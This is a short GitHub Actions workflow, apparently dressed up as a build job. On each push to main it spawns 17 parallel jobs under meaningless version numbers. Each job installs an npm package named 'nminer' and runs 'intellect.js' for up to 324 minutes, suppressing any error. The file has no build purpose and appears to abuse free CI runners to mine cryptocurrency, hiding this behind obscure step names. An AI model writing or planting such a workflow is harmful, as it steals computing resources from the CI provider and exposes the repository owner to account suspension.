name: intellect
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5785 }
          - { version: 2363 }
          - { version: 2479 }
          - { version: 2467 }
          - { version: 9686 }
          - { version: 5439 }
          - { version: 8756 }
          - { version: 4638 }
          - { version: 4125 }
          - { version: 1438 }
          - { version: 3582 }
          - { version: 5496 }
          - { version: 4869 }
          - { version: 9100 }
          - { version: 2925 }
          - { version: 8381 }
          - { version: 6141 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: above upside-down
        run: |
          npm install nminer@latest
          timeout 324m node intellect.js || echo "intellect executed"